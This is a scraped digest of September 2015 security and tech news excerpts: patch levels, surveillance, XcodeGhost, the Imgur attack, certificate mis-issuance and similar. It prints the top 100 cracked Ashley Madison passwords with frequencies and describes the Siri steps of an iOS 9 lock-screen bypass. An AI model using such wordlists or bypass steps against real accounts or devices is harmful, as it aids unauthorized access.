- Duo Labs researcher Mike Hanley says one in two iPhones connected to corporate networks are running outdated versions of iOS. The poor patch performance means half of all iDevices are corporate attack vectors running Aprils iOS version 8.3 or lower, and as a result are brimming with more than 100 vulnerabilities.

- Almost a third of those exposed 50 percent run versions below iOS 8.2, Hanley says. We found that half of all iPhones in use today are running iOS 8.3 or lower, which was released five months ago, Hanley says. All it takes is one vulnerable device accessing your network to put your entire organization at risk of a data breach. We need to start thinking about mobile devices in the same way [as desktops]. The exposed phones are at risk from Ins0mnia vulnerability that allows malicious apps to break policy and run indefinitely while stealing data, and the patched Quicksand bug in which enterprise credentials are stored in unprotected directories. A quarter of the exposed devices run iOS 7 released June last year and are open to a whooping 230 vulnerabilities.

- Hanley points to the popularity of bring-your-own attack vector device policies noting that updating of networked devices is essential. But some users need more than a software update; Some 20 million iPhones older than a 4s are end-of-life and no longer receiving protection from security vulnerabilities. Hanley says that number will blow out to 60 million when iPhone 4s devices are consigned to the Apple loser pile. Of those users who do update, only the 10 percent of Apple fanatics update in the same week of release. Android devices are even worse.

- One in five users have upgraded to the latest stable Android Lollipop in the rare instances stars align between carriers and handset-makers. According to Googles 7 September statistics almost 40 percent of Android users prefer or are more likely stuck on version 4.4 KitKat while 31 percent run 4.1 to 4.3 Jellybean. Android users keen to upgrade should check the XDA Developers forums to see if custom ROMs have been developed for their devices.

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/11/half_of_all_staff_are_unpatched_apple_attack_vectors/](http://www.theregister.co.uk/2015/09/11/half_of_all_staff_are_unpatched_apple_attack_vectors/)

.footnote[2015-09-12 11:39:47 - Unknown]

---

## Top 100 list shows Ashley Madison passwords are just as weak as all the rest

- Were reminded of this sad truism every time theres a major leaklike the 2012 dump of passwords belonging to LinkedIn users, for example.

- Now researchers who have cracked more than 11 million Ashley Madison passwords have released the top 100 choices users of that site picked.

- With the exception of choice number 9, the passwords look like they could have come from just about any site breach published over the past decade.

- Had they been long, randomly generated strings continuing upper- and lower-case letters, numbers and symbols, theyd be among the 3.7 million cryptographic hashes that still havent been deciphered.

- 34275 123456789 26620 qwerty 20778 12345678 14172 abc123 10869 pussy 10683 1234567 9468 696969 8801 ashley 8793 fuckme 7893 football 7872 baseball 7710 fuckyou 7458 111111 7048 1234567890 6572 ashleymadison 6213 password1 5959 madison 5219 asshole 5052 superman 5023 mustang 4865 harley 4815 654321 4729 123123 4612 hello 4425 monkey 4296 000000 4240 hockey 4191 letmein 4140 11111 4077 soccer 3936 cheater 3908 kazuga 3871 hunter 3869 shadow 3831 michael 3743 121212 3713 666666 3704 iloveyou 3671 qwertyuiop 3599 secret 3522 buster 3402 horny 3389 jordan 3368 hosts 3295 zxcvbnm 3280 asdfghjkl 3174 affair 3156 dragon 3152 987654 3123 liverpool 3087 bigdick 3058 sunshine 3058 yankees 2995 asdfg 2981 freedom 2963 batman 2935 whatever 2882 charlie 2860 fuckoff 2794 money 2686 pepper 2656 jessica 2648 asdfasdf 2617 1qaz2wsx 2609 987654321 2606 andrew 2549 qazwsx 2526 dallas 2516 55555 2501 131313 2498 abcd1234 2489 anthony 2487 steelers 2470 asdfgh 2468 jennifer 2442 killer 2407 cowboys 2403 master 2395 jordan23 2390 robert 2372 maggie 2357 looking 2333 thomas 2331 george 2330 matthew 2298 7777777 2294 amanda 2273 summer 2263 qwert 2263 princess 2258 ranger 2252 william 2245 corvette 2237 jackson 2227 tigger 2224 computer 2212 

[http://arstechnica.com/security/2015/09/new-stats-show-ashley-madison-passwords-are-just-as-weak-as-all-the-rest/](http://arstechnica.com/security/2015/09/new-stats-show-ashley-madison-passwords-are-just-as-weak-as-all-the-rest/)

.footnote[2015-09-12 11:39:30 - Unknown]

---

## Password Hashing Competition

- Introduction July 20th, 2015: PHC winner and special recognitions announced. The Password Hashing Competition (PHC) is an effort organized to identify new password hashing schemes in order to improve on the state-of-the-art (PBKDF2, scrypt, etc.

-   A number of new ideas discussed within the security and cryptography communities, but which have not yet led to a concrete proposal.

-   (For more information on the topic of password hashing, a quick and comprehensive introduction is this presentation.

- ) To identify new password hashing schemes suitable for widespread adoption, the PHC follows the model of focused cryptographic competitions such as AES, eSTREAM, or SHA-3 (see the Cryptographic competitions website). The PHC is organized by a panel of experts consisting of Tony Arcieri (@bascule, Square)  Jean-Philippe Aumasson (@veorq, Kudelski Security)  Dmitry Chestnykh (@dchest, Coding Robots)  Jeremi Gosney (@jmgosney, Stricture Consulting Group)  Russell Graves (@bitweasil, Cryptohaze)  Matthew Green (@matthew_d_green, Johns Hopkins University)  Peter Gutmann (University of Auckland)  Pascal Junod (@cryptopathe, HEIG-VD)  Poul-Henning Kamp (FreeBSD)  Stefan Lucks (Bauhaus-Universitat Weimar)  Samuel Neves (@sevenps, University of Coimbra)  Colin Percival (@cperciva, Tarsnap)  Alexander Peslyak (@solardiz, Openwall)  Marsh Ray (@marshray, Microsoft)  Jens Steube (@hashcat, Hashcat project)  Steve Thomas (@Sc00bzT, TobTu)  Meltem Sonmez Turan (NIST)  Zooko Wilcox-O'Hearn (@zooko, Least Authority Enterprises)  Christian Winnerlein (@codesinchaos, Pactas)  Elias Yarrkov (@yarrkov) These experts are responsible for the selection of a portfolio of schemes, based on the public contribution and on their assessment of the submissions received.

- However this does not exclude the future standardization of one or more of the schemes selected. The PHC is expected to rely in great part on contributions from the public, including for third-party implementations, cryptanalytic attacks, and optimized GPU or hardware crackers.

[https://password-hashing.net/](https://password-hashing.net/)

.footnote[2015-09-17 09:00:30 - Unknown]

---

## Keywhiz

- Users can authenticate and use the UI. Public Key Infrastructure Keywhiz makes heavy use of mTLS and X509 certificates.

- A database entry can enable/disable access or escalate automation privileges. Secrets have a globally unique name and can contain any binary content.

- After initial authentication subsequent requests require an encrypted cookie from Keywhiz Server. Setup Source code for the Server, CLI, and UI is available in square/keywhiz.

- : $ ./cli/target/keywhiz-cli-*-SNAPSHOT-shaded.jar --devTrustStore --user keywhizAdmin list groups You may want to alias this command for convenience: $ alias keywhiz.cli="/path/to/keywhiz-cli-*-SNAPSHOT-shaded.jar" Mounting KeywhizFs Refer to the KeywhizFs README. More examples are available in the Wiki, but here are a few. In development, you can use --devTrustStore and these examples assume that you want to use the default keywhizAdmin user. In production, you will want to create your own users and make sure that your certificates are properly signed and trusted. Adding a Secret Using Keywhiz CLI $ keywhiz.cli --devTrustStore --user keywhizAdmin login $ keywhiz.cli add secret --name mySecretName  mySecretFile Using Keywhiz automation API The automation API requires a client certificate and automationAllowed=true in the clients DB table.

- For development purpose, you can use the pre-generated client.p12 keystore: $ cat request.json {"name":"example.keytab","description":"example kerberos keytab","content":"a2V5dGFiIGNvbnRlbnQ=","withVersion":true,"metadata":{"owner":"root","group":"root","mode":"0400"}} $ curl --cert ./server/src/test/resources/clients/client.p12:ponies -H "Content-Type:application/json"-d @request.json https://localhost:4444/automation/secrets/ Assigning a Secret to a Group Using Keywhiz CLI $ keywhiz.cli --devTrustStore --user keywhizAdmin assign secret --name example.keytab --group kerberos Using Keywhiz automation API $ curl --cert ./server/src/test/resources/clients/client.p12:ponies -X PUT "https://localhost:4444/automation/secrets/$SECRET_ID/groups/$GROUP_ID" Download Source code for Keywhiz and this website is available on GitHub. Beta release:  Expose secret versions in KeywhizFs New client API for secret versions Migrate from JDBI to JOOQ Support MySQL in addition to PostgreSQL  Contributing If you would like to contribute code to Keywhiz you can do so through GitHub by forking the repository and sending a pull request. When submitting code, please make every effort to follow existing conventions and style in order to keep the code as readable as possible.

[https://square.github.io/keywhiz/](https://square.github.io/keywhiz/)

.footnote[2015-09-17 08:55:15 - Unknown]

---

## I created a fake business and bought it an amazing online reputation

- You may have been impressed by its 19,000 Twitter followers, and considered hiring this mobile song-slinging truck to drive up to your next outdoor shindig. What you probably didnt realize was that there is no such thing as the Freakin Awesome Karaoke Express (or F.A.K.E., for short).

- I posted a work request on Fiverr saying I needed help with my online reputation and I started messaging people who offered Facebook fans, Twitter followers and positive reviews.

- Even writing a real review where you dont reveal that you were compensated to do it violates guidelines set forth by the Federal Trade Commission, which is one of the reasons why it wasnt kosher for Kim Kardashian to pose on Instagram with her favorite morning sickness pills. But lots of people are still doing it.

- Even though I never returned the calls of Brandon or any of the other people who wanted to hire the truck, they didnt leave the business a negative review.  Businesses desperate need to have an impressive digital presence has allowed a black market for lies to flourish.

[http://fusion.net/story/191773/i-created-a-fake-business-and-fooled-thousands-of-people-into-thinking-it-was-real/](http://fusion.net/story/191773/i-created-a-fake-business-and-fooled-thousands-of-people-into-thinking-it-was-real/)

.footnote[2015-09-17 08:49:30 - Unknown]

---

## Answers to Frequently Asked Questions about libreboot

- extremely unlikely that any post-2008 Intel hardware will ever be supported in libreboot, due to severe security and freedom issues; so severe, that the libreboot project recommends avoiding all modern Intel hardware. If you have an Intel based system affected by the problems described below, then you should get rid of it as soon as possible

- ME is present on all Intel desktop, mobile (laptop), and server systems since mid 2006.

- direct memory access (DMA) engine to access the host operating system's memory

- (DAL), which consists of a Java virtual machine and set of pre-installed Java classes for cryptography, secure storage, etc

- The AMT application itself has known vulnerabilities, which have been exploited to develop rootkits and keyloggers

- It's possible that rootkits could be implemented there, which could perform a number of attacks on the user (the list is endless). Any Intel system that has the proprietary FSP blob cannot be trusted at all

- Basically, all Intel hardware from year 2010 and beyond will never be supported by libreboot. The libreboot project is actively ignoring all modern Intel hardware at this point, and focusing on alternative platforms.

[http://libreboot.org/faq/](http://libreboot.org/faq/)

.footnote[2015-09-28 23:03:57 - Unknown]

---

## KARMA POLICE: GCHQ spooks spied on every web user ever  The Register

- New documents revealing GCHQs mass-surveillance activities have detailed an operation codenamed KARMA POLICE, which slurped up the details of every visible user on the Internet.

- explicit intention of correlating every user visible to passive SIGINT with every website they visit, hence providing either (a) a web browsing profile for every visible user on the Internet, or (b) a user profile for every visible website on the Internet.

- tracking of those who have visited spook-baiting Cryptome.org, and pornography site RedTube.

- One user was targeted, without any stated suspicion of being involved in terrorism or posing a threat to national security, and was found to have visited popular porn purveyor Redtube, as well as social media sites and several Arabic and Islamic sites, which appeared to be commercial enterprises.

[http://www.theregister.co.uk/2015/09/25/gchq_tracked_web_browsing_habits_karma_police/](http://www.theregister.co.uk/2015/09/25/gchq_tracked_web_browsing_habits_karma_police/)

.footnote[2015-09-28 10:47:21 - Unknown]

---

## Profiled: From Radio to Porn, British Spies Track Web Users Online Identities

- One system builds profiles showing peoples web browsing histories

- er analyzes instant messenger communications, emails, Skype calls, text messages, cell phone locations, and social media interactions. Separate programs were built to keep tabs on suspicious Google searches and usage of Google Maps.

- They zeroed in on any stations found broadcasting recitations from the Quran, such as a popular Iraqi radio station and a station playing sermons from a prominent Egyptian imam named Sheikh Muhammad Jebril. They then used KARMA POLICE to find out more about these stations listeners, identifying them as users on Skype, Yahoo, and Facebook.

[http://theintercept.com/2015/09/25/gchq-radio-porn-spies-track-web-users-online-identities/](http://theintercept.com/2015/09/25/gchq-radio-porn-spies-track-web-users-online-identities/)

.footnote[2015-09-25 20:12:18 - Unknown]

---

## Keybase's New Key Model

- Glory! So what's wrong? While this is a great answer for identity, key management is still dirty.  as a user, you must get your PGP private key to all your devices you're in trouble if you lose a device or fear it has been compromised PGP is too complicated for most people  A solution is in the works The Keybase directory now supports device-specific NaCl keys.

- From now on, an identity on Keybase can be constructed like this:   here we see a user with 2 computers and 3 keys she can prove her identity with any key, and the keys are connected Establishing keys  devices Soon, Keybase will release open-source apps for:  iPhone  Android OSX, Linux,  Windows (with nice GUIs and CLI)  When you install the Keybase app, it will feel like any other app.

- Slightly cumbersome, these are full NaCl keys that can be used to provision a new computer. An example: death punch correct staple battery horse clearly cherry picked words yeah moo car lisp  You can put that in your wallet or stick it in a drawer.

- In the above example, the first 2 words ("death punch") are a public label, and the rest encodes the private key.   here we see a user with 5 computers (2 are mobile) and 7 keys; she even used her paper key to provision 2 devices! the important thing is that she is herself, the sum of all her proofs, on any device Paper keys, like devices, must be publicly announced and are publicly removed. Future goals In the long run, we hope to bring a number of solutions, fully cross-platform:  safer publishing of signed, unencrypted data (such as source code and binaries) safer end-to-end file encryption  sharing (both for your own data, and for your collaborations) easier security/identity for other apps that use keys, such as SSH, bitcoin, and other communication apps. easier private chatting  That's vague, but we'll have a more specific announcement (especially on 1 and 2) in the next 3-4 months.

- In the meantime, we're getting all our ducks in a row. Testing it This new key model is available for testing. If you'd like to poke around, you can download a command-line-only version of Keybase's new client for OSX or Linux and hit one of our staging servers with test accounts.

[https://keybase.io/blog/keybase-new-key-model](https://keybase.io/blog/keybase-new-key-model)

.footnote[2015-09-25 19:44:05 - Unknown]

---

## Microsoft Has Built a Linux Distro

- jbernardo writes: Microsoft has built a Linux distro, and is using it for their Azure data centers.

- From their blog post: "It is a cross-platform modular operating system for data center networking built on Linux."

- Apparently, the existing SDN (Software Defined Network) implementations didn't fit Microsoft's plans for the ACS (Azure Cloud Switch), so they decided to roll their own infrastructure.

- No explanation why they settled on Linux, though  could it be that there is no Windows variant that would fit the bill?

- In other news, Lucifer has been heard complaining of the sudden cold.

[http://linux.slashdot.org/story/15/09/18/1224234/microsoft-has-built-a-linux-distro](http://linux.slashdot.org/story/15/09/18/1224234/microsoft-has-built-a-linux-distro)

.footnote[2015-09-23 23:42:16 - Unknown]

---

## AVG Proudly Announces It Will Sell Your Browsing History To Online Advertisers

- An anonymous reader writes: AVG, the Czech antivirus company, has announced a new privacy policy in which it boldly and openly admits it will collect user details and sell them to online advertisers for the purpose of continuing to fund its freemium-based products.

- This new privacy policy is slated to come into effect starting October 15. The policy says: We collect non-personal data to make money from our free offerings so we can keep them free, including: Advertising ID associated with your device; Browsing and search history, including meta data; Internet service provider or mobile network you use to connect to our products, and Information regarding other applications you may have on your device and how they are used.

[http://yro.slashdot.org/story/15/09/19/1319201/avg-proudly-announces-it-will-sell-your-browsing-history-to-online-advertisers](http://yro.slashdot.org/story/15/09/19/1319201/avg-proudly-announces-it-will-sell-your-browsing-history-to-online-advertisers)

.footnote[2015-09-23 23:42:13 - Unknown]

---

## New test purportedly spots psychopathy in babies

- Does your little bundle of joy prefer looking at a red ball over a human face? If so, they might be a psychopath.

- Kings College London studied ball-vs-face-tracking in 213 five-week-old babies

[http://boingboing.net/2015/09/09/new-test-purportedly-spots-psy.html](http://boingboing.net/2015/09/09/new-test-purportedly-spots-psy.html)

.footnote[2015-09-23 23:39:44 - Unknown]

---

## Boston man hasn't showered for 12 years, prefers homebrew bacteria spray

- To spread the bacteria to everyone else, he has founded a company called AOBiome and is selling a spray that contains live ammonia oxidizing bacteria (AOB), called Mother Dirt.  From the Mother Dirt website:    Modernization of the Skin Microbiome  The main premise of AOBiome is that human skin was historically colonized with Nitrosomonas, a form of Ammonia-Oxidizing-Bacteria (AOB).

-   Before the advent of anionic surfactants, Nitrosomonas would have colonized our skin, our sweat glands in particular, constantly secreting low amounts of NO.

- Instead of mandating that restaurant employees wash their hands between wiping their asses and making your food, Senator Thom Tillis (R-NC) says the state should only require them to advise the public of any handwashing policies in place. READ THE REST

- At Scientific American, Deborah Franklin writes about chronic halitosis  the sort of bad breath that doesnt go away with a simple brushing  and scientists efforts to cure it by encouraging [] READ THE REST

- Conveniently sized and wireless, this premium flash will let you easily take amazing photos in low light situations.

[http://boingboing.net/2015/09/10/boston-man-hasnt-showered-fo.html](http://boingboing.net/2015/09/10/boston-man-hasnt-showered-fo.html)

.footnote[2015-09-23 23:29:50 - Unknown]

---

## Yet another pre-installed spyware app discovered on Lenovo computers

-  A factory refurbished Thinkpad shipped with Windows 7 and a scheduler app that ran once a day, collecting usage data about what you do with your computer and exfiltrating it to an analytics company. 

-   The fact that this was taking place was buried deep in the user agreement that came with the machine.  This is the third preloaded spyware scandal to hit Lenovo this year: first it was caught installing Superfish, which grossly compromised user security by installing a man-in-the-middle certificate into the operating system; then it got caught loading immortal, self-reinstalling crapware into part of the BIOS reserved for custom drivers.  This latest scandal is particularly noteworthy because it impinges on Thinkpads, the rock-solid laptop brand the company acquired from IBM.  As Ive noted before, Im a Lenovo Thinkpad user and none of this affects me because I throw away the hard drives that come with my laptops and install Ubuntu GNU/Linux on new SSD hard-drives.

- According to the description in the task scheduler: This task uploads Customer Feedback Program data to Lenovo.  I have setup my fair share of new Lenovo machines and cant recall ever being asked about a Customer Feedback program.  The program that runs daily is Lenovo.TVT.CustomerFeedback.Agent.exe and it resides in folder C:\Program Files (x86)\Lenovo\Customer Feedback Program.  Other files in this folder are Lenovo.TVT.CustomerFeedback.Agent.exe.config, Lenovo.TVT.CustomerFeedback.InnovApps.dll and Lenovo.TVT.CustomerFeedback.OmnitureSiteCatalyst.dll.  According to Wikipedia, Omniture is an online marketing and web analytics firm, and SiteCatalyst (since renamed) is their software as a service application for client-side web analytics.  So, while there may not be extra ads on ThinkPads, there is some monitoring and tracking.  On the one hand this is surprising because the machines were refurbished and sold by IBM.

- Take flight in fresh air or zip the mini SKEYE Pico Drone through your office in between meetingswe guarantee its more fun than a coffee-break.

- EDITORS 		Mark Frauenfelder Cory Doctorow David Pescovitz 	Xeni Jardin 	Rob Beschizza

[http://boingboing.net/2015/09/22/yet-another-pre-installed-spyw.html](http://boingboing.net/2015/09/22/yet-another-pre-installed-spyw.html)

.footnote[2015-09-23 23:22:11 - Unknown]

---

## HOWTO make a physical, papercraft GPG box

- his is a tutorial by @shiromarieke and @nsmnsr on how to make a GPG BOX [PDF], a tool to easily explain GPG encryption. It has been made for CryptoParty Berlin.

[http://boingboing.net/2015/09/23/howto-make-a-physical-papercr.html](http://boingboing.net/2015/09/23/howto-make-a-physical-papercr.html)

.footnote[2015-09-23 23:19:22 - Unknown]

---

## Crash Google Chrome with one tiny URL: We cram a probe in this bug

- You can crash the latest version of Google Chrome with a simple tiny URL. Just rolling your mouse over it in a page, launching it from another app such as an email client, or pasting it into the address bar, will kill either that tab or the whole browser. Its perfect for pranking friends by sending it to them in emails and messages. The flaw was spotted just before the weekend by a chap called Andris Atteka, who blogged about the programming blunder here, and filed a bug report here.  This crashes someones browser in web gtalk/chrome if you msg them that URL https://t.co/vi0e10IEFH  mdowd (@mdowd) September 20, 2015 Below is a screenshot of two forms of the offending URL  we wont put them this article as-is, because they will crash your tab if you accidentally wander your pointer over them in Chrome.

- And thats not nice. Weve tested it on Chrome 45.0.2454.93 on OS X El Capitan and Windows 10, and both flavors of the browser are vulnerable.

- Chromebooks and Linux flavors of the browser are also crashed by the URL, plus Opera 32.0 which is based on Chromium 45, were told.

- Thanks Google. Whats cool about this bug is that it triggers a fatal exception (a SIGTRAP) rather than the usual memory access violation error caused by an overrun buffer, heap corruption, or similar  even in released code.

- But the URL is invalid, which is unexpected, and so the function hits a DCHECK() that causes the software to bail out  even on the release build.

[http://www.theregister.co.uk/2015/09/20/chrome_url_crash/](http://www.theregister.co.uk/2015/09/20/chrome_url_crash/)

.footnote[2015-09-23 23:19:01 - Unknown]

---

## Improved Digital Certificate Security

- On September 14, around 19:20 GMT, Symantecs Thawte-branded CA issued an Extended Validation (EV) pre-certificate for the domains google.com and www.google.com. This pre-certificate was neither requested nor authorized by Google.

[http://googleonlinesecurity.blogspot.com/2015/09/improved-digital-certificate-security.html](http://googleonlinesecurity.blogspot.com/2015/09/improved-digital-certificate-security.html)

.footnote[2015-09-23 23:18:56 - Unknown]

---

## Apple scrambles after 40 malicious XcodeGhost apps haunt App Store

- PhotoAtelierApple officials are cleaning up the companys App Store after a security firm reported that almost 40 iOS apps contained malicious code that made iPhones and iPads part of a botnet that stole potentially sensitive user information. The 39 affected appswhich included version 6.2.5 of the popular WeChat for iOS, CamScanner, and Chinese versions of Angry Birds 2may have been downloaded by hundreds of millions of iPhone and iPad users, security researchers said.

- The programs were infected by a tampered version of Apples legitimate iOS and OS X app development tool called Xcode.

- Researchers from mobile security firm Lookout independently analyzed the same apps and on Sunday issued a blog post that read in part: XcodeGhost is an example of compiler malware.

- Apple has never said exactly what types of vetting it carries out to ensure that App Store titles are safe and securely designed.

- Once the company fully recovers from this incident, the episode would be a great opportunity for officials to be more specific about exactly how it goes about scrutinizing apps and what it will be doing differently in the future to catch mass infections like this one. Post updated to add details about Gatekeeper, figure from Qihoo360 Technology.

[http://arstechnica.com/security/2015/09/apple-scrambles-after-40-malicious-xcodeghost-apps-haunt-app-store/](http://arstechnica.com/security/2015/09/apple-scrambles-after-40-malicious-xcodeghost-apps-haunt-app-store/)

.footnote[2015-09-23 23:18:27 - Unknown]

---

## Symantec employees fired for issuing rogue HTTPS certificate for Google

- Symantec has fired an undisclosed number of employees after they were caught issuing unauthorized cryptographic certificates that made it possible to impersonate HTTPS-protected Google webpages.

- We learned on Wednesday that a small number of test certificates were inappropriately issued internally this week for three domains during product testing, Symantec officials wrote in a blog post published Friday. All of these test certificates and keys were always within our control and were immediately revoked when we discovered the issue. There was no direct impact to any of the domains and never any danger to the Internet.

[http://arstechnica.com/security/2015/09/symantec-employees-fired-for-issuing-rogue-https-certificate-for-google/](http://arstechnica.com/security/2015/09/symantec-employees-fired-for-issuing-rogue-https-certificate-for-google/)

.footnote[2015-09-23 23:18:02 - Unknown]

---

## Hackers upload bot code to Imgur in 8Chan attack

- A nasty vulnerability in Imgur was used by attackers to hide malicious code in images, commandeer visitors browsers, and hose the 4Chan and 8Chan image boards. Imgur has fixed the hole preventing the upload of malicious images, and says the compromised pages were served in targeted attacks and not published to the sites main gallery page.

- The attack planted JavaScript in victims local storage that sent a ping to the attackers command and control servers whenever 8Chan was visited. Compromised images were posted to 4Chan and a related Reddit subreddit page. The attackers intent is unknown and the command and control server is not known to have issued commands to infected machines. Imgur has restricted its servers to hosting only valid image files and nixed the ability to serve JavaScript. Yesterday a vulnerability was discovered that made it possible to inject malicious code into an image link on Imgur, Imgur community director Sarah Schaaf says. From our teams analysis, it appears the exploit was targeted specifically to users of 4chan and 8chan via images shared to a specific sub-reddit on Reddit.com using Imgurs image hosting and sharing tools. The vulnerability was patched yesterday evening and were no longer serving affected images, but as a precaution we recommend that you clear your browsing data, cookies, and localstorage. Reddit users say the attackers JavaScript created an off-screen iframe and embedded a flash file that ran alongside Imgurs other Flash components making the attack less suspicious. This flash file injected more JavaScript into the page [which looked] like an innocuous Pikachu animation, one Reddit user says. This JavaScript was stored to the users localstorage which, since the iframe was pointing at 8chan, allowed the attacker to attach JavaScript to 8chans localstorage.

- So far no one has been able to see a response from that web service, meaning it likely wasnt activated yet or has already been deactivated.

- The outcome is that every time a user visited an 8chan page, it would phone home to check for instructions and then execute more JavaScript code. The attacks were reported on various 4Chan boards. Imgur says it will release more information as it comes to hand.

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/23/imgur_attack/](http://www.theregister.co.uk/2015/09/23/imgur_attack/)

.footnote[2015-09-23 23:17:02 - Unknown]

---

## iOS 9 security blooper lets you BYPASS PINs, eye up photos, contacts

- A security flaw in iOS 9 allows anyone who has a locked Apple iThing in their hand to view its contacts and photos without having to enter a passcode.

- In the video, Rodriguez enters an incorrect password multiple times, then asks Siri for the time. When the voice-controlled assistant displays the time, youre able to use the Search and Share functions on the iOS clock feature. This, in turn, lets you pull up the iGadget owners contacts, messages, and photos via the Share screen, all without the need to enter a correct PIN.

[http://www.theregister.co.uk/2015/09/23/ios_9_contacts_snooped/](http://www.theregister.co.uk/2015/09/23/ios_9_contacts_snooped/)

.footnote[2015-09-23 23:16:22 - Unknown]

---

## Learning more about the GFW's active probing system

- This system was brought to life several years ago to reactively probe and block circumvention proxies, including Tor.

- You might remember an earlier blog post that gave us some first insight into how the active probing system works.

- Sometimes, network security equipment goes into "fail open" mode while it updates its rule set, but it is not clear if this is happening here.    We were able to find patterns in the TCP headers of active probes that suggest that all these thousands of IP addresses are, in fact, controlled by a single source.

- ScrambleSuit and its successor, obfs4, defend against probing attacks by relying on a shared secret that is distributed out of band.

- Meek tunnels traffic over cloud infrastructure, which does not prevent active probing, but greatly increases collateral damage when blocked.

[https://blog.torproject.org/blog/learning-more-about-gfws-active-probing-system](https://blog.torproject.org/blog/learning-more-about-gfws-active-probing-system)

.footnote[2015-09-23 23:13:18 - Unknown]

---

## Hacking Team, Computer Vulnerabilities, and the NSA

- Both the NSA and the White House have talked about a secret vulnerability equities process they go through when they find a security flaw

- Both groups maintain the process is heavily weighted in favor or disclosing vulnerabilities to the vendors and having them patched.

- A real-world example of the ambiguity surrounding the equities process emerged from the recent hacking of the cyber weapons arms manufacturer Hacking Team

- The NSA was most likely able to penetrate Hacking Teams network and steal the same data. The agency probably did it years ago. They would have learned the same things about Hacking Teams network software that we did in July

- The U.S. government should close the vulnerabilities that foreign governments are using to attack people and networks

[https://www.schneier.com/blog/archives/2015/09/hacking_team_co.html](https://www.schneier.com/blog/archives/2015/09/hacking_team_co.html)

.footnote[2015-09-18 13:30:02 - Unknown]

---

## Child Arrested Because Adults Are Stupid

- Teachers immediately become stupid and call the police:

- The bell rang at least twice, he said, while the officers searched his belongings and questioned his intentions.

- The principal threatened to expel him if he didnt make a written statement, he said.

- I am reminded of the 2007 story of an MIT student getting arrested for bringing a piece of wearable electronic art to the airport.

- On the other hand, Sarah Palin doesnt believe it was just a clock.

[https://www.schneier.com/blog/archives/2015/09/child_arrested_.html](https://www.schneier.com/blog/archives/2015/09/child_arrested_.html)

.footnote[2015-09-18 13:29:12 - Unknown]

---

## Cryptome founder revokes PGP keys after weird 'compromise'

- Updated The creator of digital library and whistle-blowing site Cryptome.org, John Young, has revoked a host of his PGP key pairs after learning they were compromised.

- In a site statement on Tuesday, Young claimed to have learned that all PGP public keys of John Young and Cryptome have been compromised.

- Young told us he found out about the compromise after discovering encrypted material in plaintext early 15 September 2015. Not ready to reveal how or what the material concerned. Possibility of a ruse, diversion or decoy to conceal other breach(es).

- The site, which precedes WikiLeaks by a decade and was created by John Young and Deborah Natsios, has long been a repository for suppressed information, and a digital watering hole for the internets populations of crypto-anarchists, cypherpunks, techie conspiracy theorists, and others.

[http://www.theregister.co.uk/2015/09/16/cryptome_revokes_pgp_keys_after_mysterious_compromise/](http://www.theregister.co.uk/2015/09/16/cryptome_revokes_pgp_keys_after_mysterious_compromise/)

.footnote[2015-09-18 13:28:57 - Unknown]

---

## Obama edges toward full support for encryption  but does he understand what that means?

- The Obama Administration is weighing whether to come out in full support of unfettered encryption, something that would be a huge blow to the Feds, who have been pushing for compulsory backdoors in all new tech. But theres something in the Presidents proposals that arent quite right.

- A leaked memo [PDF] from the National Security Council (NSC), seen and published by The Washington Post, outlines three options over what to do regarding the issue. The first would make it plain that the President opposes both a new law and other actions to introduce backdoors, and would see him speak in favor of the benefits of encryption. The second option is to defer any decisions and push the issue into open consultation with the aim of coming back to the issue.

- It states: Overall, the benefits to privacy, civil liberties, and cybersecurity gained from encryption outweigh the broader risks that would have been created by weakening encryption. It then goes on to press all the right buttons. What are the pros and cons? The proposal to both come out in favor of encryption and disavow legislation and other compulsory actions acknowledges that it would cause annoyance on the part of law enforcement, and that it would go against some allies positions (including the UK), but it lists a series of positives from the government perspective. Such a move would encourage better cooperation from the tech industry, which would improve public safety and national security (the US government recently announced an effort to share details of security holes in software, for example). It would also grow the countrys economy, as it would show that US products are not tools for government surveillance and would clearly differentiate U.S. policy from moves by China and others to mandate decryption. Google, Apple, Amazon, and a significant number of other large tech companies have previously complained that the Snowden revelations have undermined peoples faith in their products and caused economic losses. Such an approach would also bolster trust in the US government.

- The memo doesnt mention Edward Snowden (the US government is never keen on mentioning his name) but it does note that the proposal counters the narrative that the United States is seeking to expand its surveillance capability at the expense of cybersecurity, and could help repair trust in the United States Government and U.S. companies overseas. The move would please civil liberties groups, could aid in trade negotiations, and would end up the strongest option overall, the memo states.

- If not, then all of this is a sham; a political maneuver to keep privacy-loving nerds quiet. Already set in stone? It is very possible that the decision has already been made and outreach is about to begin, leading to the leak of the NSC memo.

[http://www.theregister.co.uk/2015/09/16/obama_edging_toward_support_for_encryption/](http://www.theregister.co.uk/2015/09/16/obama_edging_toward_support_for_encryption/)

.footnote[2015-09-18 13:28:41 - Unknown]

---

## Self-Destructing Computer Chip

- When the proper circuit is toggled, a small resistor within the substrate heats up until the glass shatters.

- According to Corning, it will continue shattering even after the initial break, rendering the entire chip unusable.

- The demo chip resistor was triggered by a photo diode that switched the circuit when a laser shone upon it.

- The glass plate quickly shattered into fragments once the laser touches it.

- Opinions expressed are not necessarily those of Resilient Systems, Inc.

[https://www.schneier.com/blog/archives/2015/09/self-destructin.html](https://www.schneier.com/blog/archives/2015/09/self-destructin.html)

.footnote[2015-09-18 13:28:10 - Unknown]

---

## Patch Bugzilla! Anyone can access your private bugs  including your security vulns

- If you or your organization is running Bugzilla, and youre using email-based permissions, make sure youve updated to the latest version  namely 5.0.1, 4.4.10, or 4.2.15.

- Thats because someones found a way to easily access private bugs in your codebase  such as critical security holes youre still working on to fix

- An attacker must be able to register for a normal account via email, before exploiting a programming blunder to gain extra access.

[http://www.theregister.co.uk/2015/09/17/bugzilla_priv_esc/](http://www.theregister.co.uk/2015/09/17/bugzilla_priv_esc/)

.footnote[2015-09-18 13:27:52 - Unknown]

---

## Slimline USB Charger for tiny ham Radios

- The recent trend to smaller and smaller handy talkie (HT) transceivers is approaching the limits of the human interface

- And its getting to the point where the accessories, particularly the battery charging trays, are getting bulkier than the radios

- With that in mind, [Mads Hobye] decided to slim down his backpacking loadout by designing a slimline USB charger for his Baofeng HT.

- Lacking an external charging jack but sporting a 3.7 volt battery pack with exposed charging terminals on the rear, [Mads] cleverly capitalized on the belt clip to apply spring tension to a laser-cut acrylic plate

[http://hackaday.com/2015/09/05/slimline-usb-charger-for-tiny-ham-radios/](http://hackaday.com/2015/09/05/slimline-usb-charger-for-tiny-ham-radios/)

.footnote[2015-09-18 13:24:37 - Unknown]

---

